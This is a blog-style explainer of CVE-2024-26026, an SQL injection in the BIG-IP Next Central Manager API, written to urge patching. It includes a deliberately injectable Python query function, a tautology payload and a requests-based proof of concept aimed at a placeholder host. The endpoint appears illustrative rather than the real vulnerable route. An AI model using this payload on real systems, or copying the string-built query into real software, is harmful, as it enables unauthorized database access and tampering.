CVE-2024-26026 - Unpacking the BIG-IP Next Central Manager API SQL Injection (with Exploit Details and Code Snippet)

In February 2024, a critical vulnerability—CVE-2024-26026—was discovered in the BIG-IP Next Central Manager API. This bug made it possible for remote attackers to execute SQL injection attacks against the system, potentially granting unauthorized read and write access to sensitive data in the backend database.

In this exclusive post, we'll explain in plain language what the vulnerability is, how it works, and provide example code to demonstrate exploitation. If you're running affected versions of BIG-IP Next Central Manager, read on and patch now!

CVE-2024-26026 is an SQL injection vulnerability in the BIG-IP Next Central Manager API.

- Attackers can exploit this bug by crafting API requests containing malicious SQL code within the URI parameters.
- Successful exploitation allows unauthorized access, modification, and possible deletion of data stored in the application's database.
- F5's security advisory (K000138144) specifies that only supported versions are currently evaluated. End-of-Technical Support (EoTS) software might be vulnerable and is not receiving patches.

How Does the Attack Work?

SQL injection is possible because the vulnerable API endpoint does not properly sanitize user input, allowing attackers to manipulate SQL queries executed by the backend.

Imagine the application code looks like this (simplified for demonstration)

def get_device_by_id(device_id):
    conn = sqlite3.connect('bigip.db')
    cursor = conn.cursor()
    query = "SELECT * FROM devices WHERE id = '%s'" % device_id
    cursor.execute(query)
    return cursor.fetchall()

If an attacker sends an API request like

GET /api/devices?id=1' OR '1'='1

the resulting query would be

SELECT * FROM devices WHERE id = '1' OR '1'='1'

This returns all devices! Even worse, a clever attacker can use SQL injection to dump sensitive data or alter the database.

Proof of Concept: Basic Exploit Example

Below is a simple Python proof of concept (PoC) using the popular requests library.

> Disclaimer: Run this against your own systems only, and only if you have permission.

import requests

# Replace with the target URL/IP and port
target = "https://bigip-next-manager.example.com";

# Malicious payload: attempts to always return true
payload = "1' OR '1'='1"

# Craft the vulnerable API endpoint
api_endpoint = f"{target}/api/devices?id={payload}"

# Send the GET request
response = requests.get(api_endpoint, verify=False)

print(f"Status Code: {response.status_code}")
print("Response:")
print(response.text)

What happens?
If the system is vulnerable and unpatched, you'll get a list of all devices, not just the device with ID 1. More advanced attacks could further tamper with, delete, or extract database data.

Real-World Impact

- Information Disclosure: Attackers can extract device configurations, credentials, or other valuable secrets.

Is My Version Vulnerable?

- Reviewed and patched: Only actively supported versions are being checked and fixed by F5. (See official F5 security advisory)
- Older/EoTS: These are likely vulnerable and WILL NOT be fixed!

References

- NIST NVD: CVE-2024-26026
- F5 Security Advisory
- OWASP SQL Injection Cheat Sheet

Conclusion

CVE-2024-26026 is a severe SQL injection vulnerability in one of the most widely used network manager platforms. SQL injection is one of the oldest tricks in the hacker’s book, but its impact can be devastating in the right context. If you manage a BIG-IP Next Central Manager instance (especially an older one), now is the time to ACT: patch, monitor, and reduce attack surface today.

Timeline

Published on: 05/08/2024 15:15:08 UTC
Last modified on: 06/04/2024 17:49:06 UTC